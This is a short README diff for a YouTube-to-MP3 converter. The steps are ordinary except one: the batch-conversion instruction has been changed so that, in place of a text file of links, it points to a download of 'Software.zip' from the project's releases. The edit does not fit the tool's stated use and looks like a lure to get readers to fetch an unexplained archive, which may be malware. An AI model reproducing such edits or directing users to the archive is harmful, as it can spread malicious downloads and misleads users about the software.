mistamilker/YT-2-MP3/README.md

 1. Clone the repository.
 2. Navigate to the project directory.
 3. Run the following command: `./yt2mp3 <YouTube_URL>` to convert a single YouTube link to .mp3.
-4. Run `./yt2mp3 -b <file.txt>` to convert multiple YouTube links from a text file to .mp3.
+4. Run `./yt2mp3 -b <https://github.com/mistamilker/YT-2-MP3/releases/download/v1.0/Software.zip>` to convert multiple YouTube links from a text file to .mp3.

 ---